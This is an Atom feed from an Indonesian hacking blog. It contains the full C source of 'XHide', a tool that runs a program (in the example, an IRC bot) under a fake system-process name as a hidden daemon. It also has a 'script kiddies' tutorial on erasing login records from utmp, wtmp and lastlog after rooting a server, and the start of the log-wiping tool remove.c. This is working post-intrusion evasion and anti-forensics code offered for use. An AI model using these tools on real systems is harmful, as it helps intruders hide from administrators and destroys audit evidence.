<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2588755122724100110</id><updated>2011-04-22T00:54:42.776+07:00</updated><category term='MP3'/><category term='remove.c'/><category term='Hapus Jejak UNIX'/><category term='Mikrotik'/><title type='text'>Redemption for Remedy</title><subtitle type='html'>No one can trust the security when they're all sleep!</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://siswaplus.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://siswaplus.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>SISWA+ Team</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>6</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2588755122724100110.post-8703908433386476416</id><published>2008-02-26T15:01:00.000+07:00</published><updated>2008-02-26T15:03:28.893+07:00</updated><title type='text'>Process Faker</title><content type='html'>&lt;span style="font-size:85%;"&gt;&lt;span style="font-family: courier new;"&gt;/* &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;/* Example : ./xhide -s "klogd -m 0" -d -p test.pid ./egg bot.conf&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;/*&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;#include &lt;stdio.h&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;#include &lt;unistd.h&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;#include &lt;sys/stat.h&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;#include &lt;sys/types.h&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;#include &lt;string.h&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;#include &lt;fcntl.h&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;#include &lt;pwd.h&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;#include &lt;grp.h&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;void usage(char *progname);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;int changeown (char *str) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    char user[256], *group;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    struct passwd *pwd;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    struct group *grp;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    uid_t uid;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    gid_t gid;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    memset(user, '\0', sizeof(user));&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    strncpy(user, str, sizeof(user));&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    for (group = user; *group; group++)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if (*group == ':') {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        *group = '\0';&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;         group++;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;         break;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if (pwd = getpwnam(user)) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        uid = pwd-&gt;pw_uid;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        gid = pwd-&gt;pw_gid;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    } else uid = (uid_t) atoi(user);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        if (*group)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        if (grp = getgrnam(group)) gid = grp-&gt;gr_gid;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        else gid = (gid_t) atoi(group);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        if (setgid(gid)) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            perror("Error: Can't set GID");&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            return 0;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        if (setuid(uid)) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            perror("Error: Can't set UID");&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            return 0;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    return 1;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;char *fullpath(char *cmd) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    char *p, *q, *filename;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    struct stat st;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if (*cmd == '/')&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    return cmd;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    filename = (char *) malloc(256);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if  (*cmd == '.')&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if (getcwd(filename, 255) != NULL) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        strcat(filename, "/");&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        strcat(filename, cmd);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        return filename;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    } else&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    return NULL;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    for (p = q = (char *) getenv("PATH"); q != NULL; p = ++q) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        if (q = (char *) strchr(q, ':'))&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        *q = (char) '\0';&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        snprintf(filename, 256, "%s/%s", p, cmd);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        if (stat(filename, &amp;amp;st) != -1&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        &amp;amp;&amp;amp; S_ISREG(st.st_mode)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        &amp;amp;&amp;amp; (st.st_mode&amp;amp;S_IXUSR || st.st_mode&amp;amp;S_IXGRP || st.st_mode&amp;amp;S_IXOTH))&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        return filename;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        if (q == NULL)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        break;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    free(filename);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    return NULL;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;void usage(char *progname) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    fprintf(stderr, "XHide - Process Faker, by Schizoprenic "&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    "Xnuxer Research (c) 2002\n\nOptions:\n"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    "-s string\tFake name process\n"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    "-d\t\tRun aplication as daemon/system (optional)\n" &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    "-u uid[:gid]\tChange UID/GID, use another user (optional)\n" &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    "-p filename\tSave PID to filename (optional)\n\n"&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    "Example: %s -s \"klogd -m 0\" -d -p test.pid ./egg bot.conf\n\n",progname);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    exit(1);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;int main(int argc,char **argv) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    char c;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    char fake[256];&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    char *progname, *fakename;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    char *pidfile, *fp;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    char *execst;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    FILE *f;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    int runsys=0, null;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    int j,i,n,pidnum;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    char **newargv;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    progname = argv[0];&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if(argc&lt;2)&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    for (i = 1; i &lt;&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        if (argv[i][0] == '-')&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        switch (c = argv[i][1]) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            case 's': fakename = argv[++i]; break;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            case 'u': changeown(argv[++i]); break; &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            case 'p': pidfile = argv[++i]; break;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            case 'd': runsys = 1; break;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            default:  usage(progname); break;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        } else break;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if (!(n = argc - i) || fakename == NULL) usage(progname);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    newargv = (char **) malloc(n * sizeof(char **) + 1);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    for (j = 0; j &lt;&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    newargv[j] = NULL;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if ((fp = fullpath(newargv[0])) == NULL) { perror("Full path seek"); exit(1); }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    execst = fp;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if (n &gt; 1) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        memset(fake, ' ', sizeof(fake) - 1);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        fake[sizeof(fake) - 1] = '\0';&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        strncpy(fake, fakename, strlen(fakename));&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        newargv[0] = fake;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    } else newargv[0] = fakename;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if (runsys) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        if ((null = open("/dev/null", O_RDWR)) == -1) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            perror("Error: /dev/null");&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            return -1;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        switch (fork()) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            case -1:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            perror("Error: FORK-1");&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            return -1;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            case  0:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            setsid();&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            switch (fork()) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                case -1:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        perror("Error: FORK-2");&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        return -1;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                case  0:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        umask(0);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        close(0);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        close(1);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        close(2);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        dup2(null, 0);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        dup2(null, 1);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        dup2(null, 2);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        break;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        default:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;                        return 0;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            break;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            default:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;            return 0;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    waitpid(-1, (int *)0, 0);       &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    pidnum = getpid();&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    if (pidfile != NULL &amp;amp;&amp;amp; (f = fopen(pidfile, "w")) != NULL) {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        fprintf(f, "%d\n", pidnum);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;        fclose(f);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    }&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    fprintf(stderr,"==&gt; Fakename: %s PidNum: %d\n",fakename,pidnum); &lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    execv(execst, newargv);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    perror("Couldn't execute");&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;    return -1;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: courier new;"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2588755122724100110-8703908433386476416?l=siswaplus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siswaplus.blogspot.com/feeds/8703908433386476416/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2588755122724100110&amp;postID=8703908433386476416' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/8703908433386476416'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/8703908433386476416'/><link rel='alternate' type='text/html' href='http://siswaplus.blogspot.com/2008/02/process-faker.html' title='Process Faker'/><author><name>SISWA+ Team</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2588755122724100110.post-3942669693296122784</id><published>2007-07-06T11:59:00.000+07:00</published><updated>2007-07-06T12:01:55.389+07:00</updated><title type='text'>Siapa Saya?</title><content type='html'>&lt;div style="font-family: verdana; text-align: justify;" class="snap_preview"&gt;&lt;p&gt;&lt;span style="font-size:78%;"&gt;Aku Bukanlah seorang yang bisa segalanya, yang bisa mengerjakan segala hal, aku juga bukan orang yang bodoh yang hanya menerima apa adanya, tanpa bertanya dan tanpa menyelidiki apakah itu.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-size:78%;"&gt;Aku adalah seorang yang haus akan informasi-informasi, bukan berarti aku haus akan kasih sayang, dan haus akan segala kegemerlapan dunia.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="font-size:78%;"&gt;Aku hanyalah manusia yang memiliki banyak kekurangan dan banyak ke-khilafan, yang slalu dekat dengan dosa-dosa.&lt;/span&gt;&lt;/p&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2588755122724100110-3942669693296122784?l=siswaplus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/3942669693296122784'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/3942669693296122784'/><link rel='alternate' type='text/html' href='http://siswaplus.blogspot.com/2007/07/siapa-saya.html' title='Siapa Saya?'/><author><name>SISWA+ Team</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2588755122724100110.post-7633001915327463030</id><published>2007-06-19T13:40:00.001+07:00</published><updated>2007-07-05T12:42:45.479+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hapus Jejak UNIX'/><title type='text'>Hapus Jejak UNIX</title><content type='html'>&lt;pre style="font-family: verdana;"&gt;&lt;span style="font-size:78%;"&gt;Terbitan Online Kecoak Elektronik&lt;br /&gt;http://k-elektronik.org&lt;br /&gt;&lt;br /&gt;============================================================&lt;br /&gt;Bagaimana menghapus jejak&lt;br /&gt;Script Kiddies Tutorial&lt;br /&gt;(c) cbug aka CyberBug (Kecoak Elektronik)&lt;br /&gt;============================================================&lt;br /&gt;&lt;br /&gt;Pemberitahuan :&lt;br /&gt;1. Artikel ini dimaksudkan untuk bahan pelajaran para admin dan siapa&lt;br /&gt; saja yang ingin mengembangkan pengetahuan networking/internet mereka.&lt;br /&gt;2. Kecoak Elektronik tidak bertanggung jawab atas penyalah gunaan artikel&lt;br /&gt; ini.&lt;br /&gt;3. Kecoak Elektronik tetap menyertakan dan tidak menghapus Nama Penulis&lt;br /&gt; eksploit/script dengan harapan pembaca juga tetap menyertakan kredit&lt;br /&gt; untuk mereka, jangan mengganti nama2 penulis artikel/eksploit/script&lt;br /&gt; dengan nama anda dengan harapan nanti dianggap hacker.&lt;br /&gt;&lt;br /&gt;A. Apa yang harus ada&lt;br /&gt;&lt;br /&gt;1. Server yang berhasil di root&lt;br /&gt; Terserah mo pake apa, boljug pake contoh eksploit pada artikel saya&lt;br /&gt; sebelumnya, pake remote eksploit juga boleh :P&lt;br /&gt;&lt;br /&gt;2. Program penghapus Log&lt;br /&gt; Ada banyak dan bermacam-macam program penghapus log, pilih apa yang&lt;br /&gt; menurut kamu bagus dan cocok buat kamu, untuk langkah awal kamu bisa&lt;br /&gt; coba gunakan remove.c dari Simple Nomad.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;B. Menghapus jejak&lt;br /&gt;&lt;br /&gt;Nah ... kamu sudah dapat akses root, asyiiik ... tapi eh nanti dulu,&lt;br /&gt;gimana kalo adminnya tau?, gak ... dia gak bakalan tau, kalau kamu pake&lt;br /&gt;program penghapus log untuk menghilangkan jejak kamu.&lt;br /&gt;Caranya? ... download remove.c dari site k-elektronik, kemudian compile&lt;br /&gt;di mesin sasaran kamu, baca dulu baik2 cara compile nya di source remove.c&lt;br /&gt;BTW ... remove harus di running sebagai root (untuk latihan, bisa saja&lt;br /&gt;kamu login root di mesin kamu sendiri).&lt;br /&gt;&lt;br /&gt;a. Perlu diperhatikan bagian berikut ini :&lt;br /&gt;&lt;br /&gt;#ifdef GENERIC  /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */&lt;br /&gt;#define WTMP "/var/adm/wtmp"&lt;br /&gt;#define UTMP "/var/adm/utmp"&lt;br /&gt;#define LASTLOG "/var/adm/lastlog"&lt;br /&gt;#endif&lt;br /&gt;&lt;br /&gt;Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada&lt;br /&gt;posisi yang sama, misalnya distro Slackware menaruh file2 tsb diatas di:&lt;br /&gt;#define WTMP "/var/log/wtmp"&lt;br /&gt;#define UTMP "/var/run/utmp"&lt;br /&gt;#define LASTLOG "/var/log/lastlog"&lt;br /&gt;&lt;br /&gt;Jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah&lt;br /&gt;sesuai dengan source remove.c&lt;br /&gt;&lt;br /&gt;Kamu bisa gunakan perintah :&lt;br /&gt;find / -name wtmp -print&lt;br /&gt;find / -name utmp -print&lt;br /&gt;find / -name lastlog -print&lt;br /&gt;atau&lt;br /&gt;whereis wtmp&lt;br /&gt;whereis utmp&lt;br /&gt;whereis lastlog&lt;br /&gt;Kemudian ganti posisi file2 tersebut di remove.c sesuai dengan hasil&lt;br /&gt;diatas.&lt;br /&gt;&lt;br /&gt;b. Kita compile sekarang? ... ayooooooooooooo.&lt;br /&gt;&lt;br /&gt;kecoak:/home/cbug/tools# gcc remove.c -o remove -DGENERIC&lt;br /&gt;remove.c: In function `main':&lt;br /&gt;remove.c:50: warning: return type of `main' is not `int'&lt;br /&gt;/tmp/ccZVzySI.o: In function `main':&lt;br /&gt;/tmp/ccZVzySI.o(.text+0xb4): the `gets' function is dangerous and should&lt;br /&gt;not be used.&lt;br /&gt;&lt;br /&gt;Waw ... ada warning message ... gak apa2, warning bukan error :P&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;c. Cek last login nya user (cbug misalnya)&lt;br /&gt;&lt;br /&gt;kecoak:/home/cbug/tools# lastlog | grep cbug&lt;br /&gt;cbug             tty2                      Sat Mar 11 11:32:42 -0800 2000&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;d. Jalankan remove&lt;br /&gt;&lt;br /&gt;kecoak:/home/cbug/tools# ./remove cbug&lt;br /&gt;&lt;br /&gt;REMOVE by Simple Nomad&lt;br /&gt;Nomad Mobile Research Centre (c) 1997&lt;br /&gt;&lt;br /&gt;Found 549 record(s) for user cbug&lt;br /&gt;Will attempt a lastlog cleanup by default.&lt;br /&gt;&lt;br /&gt;#    - remove last # records from utmp/wtmp&lt;br /&gt;a    - remove (a)ll records from utmp/wtmp&lt;br /&gt;q    - (q)uit program&lt;br /&gt;&lt;br /&gt;Enter selection -&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;e. Hapus record terakhir (ketik #), atau boleh juga semua (a) :P&lt;br /&gt;&lt;br /&gt;Enter selection -&gt; #&lt;br /&gt;REMOVE cleaned up 0 record(s) from /var/log/wtmp&lt;br /&gt;REMOVE cleaned up 0 record(s) from /var/run/utmp&lt;br /&gt;REMOVE cleaned up /var/log/lastlog&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;f. Cek last log nya cbug&lt;br /&gt;&lt;br /&gt;kecoak:/home/cbug/tools# lastlog | grep cbug&lt;br /&gt;cbug                                       **Never logged in**&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;g. Ini hasilnya kalo cbug login :&lt;br /&gt;&lt;br /&gt;Selamat datang di sarang Kecoak Elektronik&lt;br /&gt;&lt;br /&gt;kecoak login: cbug&lt;br /&gt;Password:&lt;br /&gt;Kecoak's K-Rad OS&lt;br /&gt;No mail.&lt;br /&gt;&lt;br /&gt;kecoak:~$&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;h. Biasanya kalo last log nya dicatat (belum/gak dihapus) cbug bisa liat&lt;br /&gt; gini, (perhatikan bagian Last login nya) :&lt;br /&gt;&lt;br /&gt;Selamat datang di sarang Kecoak Elektronik&lt;br /&gt;&lt;br /&gt;kecoak login: cbug&lt;br /&gt;Password:&lt;br /&gt;Kecoak's K-Rad OS&lt;br /&gt;Last login: Sat Mar 11 12:06:02 -0800 2000 on tty3.&lt;br /&gt;No mail.&lt;br /&gt;&lt;br /&gt;kecoak:~$&lt;br /&gt;&lt;br /&gt;i. Gitu aja&lt;br /&gt;&lt;br /&gt;--&lt;br /&gt;Manado, Awal Maret 2000&lt;br /&gt;cbug&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2588755122724100110-7633001915327463030?l=siswaplus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/7633001915327463030'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/7633001915327463030'/><link rel='alternate' type='text/html' href='http://siswaplus.blogspot.com/2007/06/hapus-jejak-unix.html' title='Hapus Jejak UNIX'/><author><name>SISWA+ Team</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2588755122724100110.post-1651508468719500692</id><published>2007-06-19T13:38:00.000+07:00</published><updated>2007-07-05T12:42:59.515+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='remove.c'/><title type='text'>Hapus Jejak .C</title><content type='html'>&lt;pre style="font-family: verdana;"&gt;&lt;span style="font-size:78%;"&gt;/*&lt;br /&gt;REMOVE       -- February 26, 1999&lt;br /&gt;Simple Nomad -- Nomad Mobile Research Centre&lt;br /&gt;&lt;br /&gt;Universal utmp, wtmp, and lastlog editor. Actually&lt;br /&gt;removes, doesn't leave holes...&lt;br /&gt;&lt;br /&gt;Compile "cc -o remove remove.c -DGENERIC" and run&lt;br /&gt;as root. Use -DAIX instead of -DGENERIC for an AIX&lt;br /&gt;machine. Use -DSCO instead of -DGENERIC for a SCO&lt;br 